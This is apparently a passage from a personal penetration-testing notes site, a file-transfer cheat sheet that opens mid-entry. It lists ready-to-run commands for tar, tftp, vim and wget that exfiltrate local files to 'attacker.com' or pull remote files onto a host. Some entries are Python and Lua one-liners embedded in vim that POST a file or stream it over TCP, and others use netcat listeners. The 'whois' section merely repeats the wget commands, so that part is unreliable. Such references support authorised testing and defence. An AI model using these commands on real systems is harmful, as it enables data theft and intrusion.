LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH

File upload It can exfiltrate files on the network. This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_send.tar
LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh

File download It can download remote files.

This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh

TFtp

File upload : It can exfiltrate files on the network. Send local file to a TFTP server.

RHOST=attacker.com
tftp $RHOST
put file_to_send

File download : It can download remote files. Fetch a remote file from a TFTP server.

RHOST=attacker.com
tftp $RHOST
get file_to_get

File upload : It can exfiltrate files on the network.

This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'

This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.

export LPORT=8888
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'

Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
vim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download ; It can download remote files.

This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'

Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.

export LPORT=12345
export LFILE=file_to_save
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'

wget

File upload : It can exfiltrate files on the network.

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use —post-data to send hard-coded data.

URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL

File download ; It can download remote files. Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE

whois

File upload : It can exfiltrate files on the network.

URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL

File download : It can download remote files. Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE

Sources : -

───✱*.｡:｡✱*.:｡✧*.｡✰*.:｡✧*.｡:｡*.｡✱ ───

(｡•́︿•̀｡)

Explorer

Graph View

Ultimate - File Transfer Cheatsheet

What is this ?

Windows

Bitsadmin

Certutil

debug.exe

OpenSSL

PowerShell

SMB

TFTP

Visual Basic Script (VBS)

Others

Linux

Bash

curl

fetch (freeBSD)

netcat

OpenSSL

Python

rsync

SCP

socat

wget

Others

Recent Notes see history

✿ About Me ₊⊹⊹₊ Nov 07, 2025

✿ Basic Security Measures - Linux ₊⊹⊹₊ Nov 04, 2025

✿ Linux - Privilege Escalation ₊⊹⊹₊ Jul 14, 2021

Table of Contents